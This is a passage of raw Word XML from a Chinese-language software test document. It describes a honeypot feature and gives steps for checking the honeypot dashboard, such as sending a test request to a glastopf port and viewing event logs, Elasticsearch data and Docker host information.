          <w:p w14:paraId="6A5378A9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:num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取消根目录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F48D33F"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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16ED325A" wp14:editId="24B174FF">
                  <wp:extent cx="4201795" cy="2340610"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="2159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2"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="2340610"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2F15CAB0" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00C80E8B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15E28BB1"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color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>界面显示正常，功能测试正常。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0D71AE35" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="720D888E"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0C3CA424" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D34D269" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:bookmarkStart w:id="346" w:name="_Toc517255075"/>
      <w:bookmarkStart w:id="347" w:name="_Toc517280883"/>
      <w:bookmarkStart w:id="348" w:name="_Toc36487957"/>
      <w:bookmarkStart w:id="349" w:name="_Toc36573242"/>
      <w:bookmarkStart w:id="350" w:name="_Toc36630328"/>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>蜜罐</w:t>
      </w:r>
      <w:bookmarkEnd w:id="346"/>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="347"/>
      <w:bookmarkEnd w:id="348"/>
      <w:bookmarkEnd w:id="349"/>
      <w:bookmarkEnd w:id="350"/>
    </w:p>
    <w:p w14:paraId="4E78F7F6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="351" w:name="_Toc36487958"/>
      <w:bookmarkStart w:id="352" w:name="_Toc36573243"/>
      <w:bookmarkStart w:id="353" w:name="_Toc36630329"/>
      <w:r w:rsidRPr="00536672">
        <w:t>功能介绍</w:t>
      </w:r>
      <w:bookmarkEnd w:id="351"/>
      <w:bookmarkEnd w:id="352"/>
      <w:bookmarkEnd w:id="353"/>
    </w:p>
    <w:p w14:paraId="11CD6ED6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>蜜罐技术本质上是一种对攻击方进行欺骗的技术，通过布置一些作为诱饵的主机、网络服务或者信息，诱使攻击方对它们实施攻击，从而可以对攻击行为进行捕获和分析，了解攻击方所使用的工具与方法，推测攻击意图和动机，能够让防御方清晰地了解他们所面对的安全威胁，并通过技术和管理手段来增强实际系统的安全防护能力。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599EBC68" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>蜜</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://baike.baidu.com/item/%E7%BD%90" \t "/Users/zwj/Documents\\x/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>罐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>好比是情报收集系统。</w:t>
      </w:r>
      <w:hyperlink r:id="rId83" w:tgtFrame="/Users/zwj/Documents\x/_blank" w:history="1">
        <w:r w:rsidRPr="003914A3">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="28"/>
            <w:u w:val="none"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>蜜</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>罐好像是故意让人攻击的目标，引诱</w:t>
      </w:r>
      <w:hyperlink r:id="rId84" w:tgtFrame="/Users/zwj/Documents\x/_blank" w:history="1">
        <w:r w:rsidRPr="003914A3">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="28"/>
            <w:u w:val="none"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>黑客</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>前来攻击。所以攻击者入侵后，你就可以知道他是如何得逞的，随时了解针对服务器发动的最新的攻击和漏洞。还可以通过</w:t>
      </w:r>
      <w:hyperlink r:id="rId85" w:tgtFrame="/Users/zwj/Documents\x/_blank" w:history="1">
        <w:r w:rsidRPr="003914A3">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="28"/>
            <w:u w:val="none"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>窃听</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>黑客之间的联系，收集黑客所用的种种工具，并且掌握他们的社交网络。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DC035E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="354" w:name="_Toc36487959"/>
      <w:bookmarkStart w:id="355" w:name="_Toc36573244"/>
      <w:bookmarkStart w:id="356" w:name="_Toc36630330"/>
      <w:r w:rsidRPr="00536672">
        <w:t>测试步骤</w:t>
      </w:r>
      <w:bookmarkEnd w:id="354"/>
      <w:bookmarkEnd w:id="355"/>
      <w:bookmarkEnd w:id="356"/>
    </w:p>
    <w:p w14:paraId="1379D949" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="357" w:name="_Toc36487960"/>
      <w:r w:rsidRPr="00536672">
        <w:t>蜜罐面板测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="357"/>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516E270A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44917879"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1BC78CB8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>蜜罐网面板测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6981B3F9" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09DC8D51"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6D26185E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>激活控制面板数据。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0072B5E1" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FE251F7"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186F49E6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>蜜罐功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="337BDDEE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BB82A7E"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7342EEA0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>打开honey的</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>控制面板-仪表盘菜单</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>发现蜜</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>罐</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>服</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>务</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>的事件都</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>为</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>0，没有攻</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>击</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>，如下</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>图</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69C96709"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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46E22D5C" wp14:editId="6DF2EA47">
                  <wp:extent cx="4104005" cy="2156460"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="254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86"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2156460"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E82A84C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>请求</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>nodeip:88</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>端口制造一个攻击后，发现glastopf有个事件，88正是这个模块的对外端口，如图</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="257F5842"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B12870D" wp14:editId="30D3CEDF">
                  <wp:extent cx="4104005" cy="2038985"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="1841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87"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2038985"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="21699E24"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48B40FFC" wp14:editId="3ED6219F">
                  <wp:extent cx="4104005" cy="881380"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="762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88"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="881380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BE48D76"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37D499E4" wp14:editId="7220A474">
                  <wp:extent cx="4104005" cy="844550"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="1905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89"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="844550"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A13E586" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>以上图表可以看到详细攻击端口及日志。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="285910AF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>页面上数据插件导航栏可以看到</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>es</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>的信息，如图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BE1DC97"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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6951F42B" wp14:editId="0811038B">
                  <wp:extent cx="4104005" cy="942340"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="2286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90"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="942340"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="22D896F3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>集群管理导航栏查看宿主机的docker信息，如图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A23B91F"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0FC1B0E2" wp14:editId="14AB8939">
                  <wp:extent cx="4104005" cy="1896745"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="825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91"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
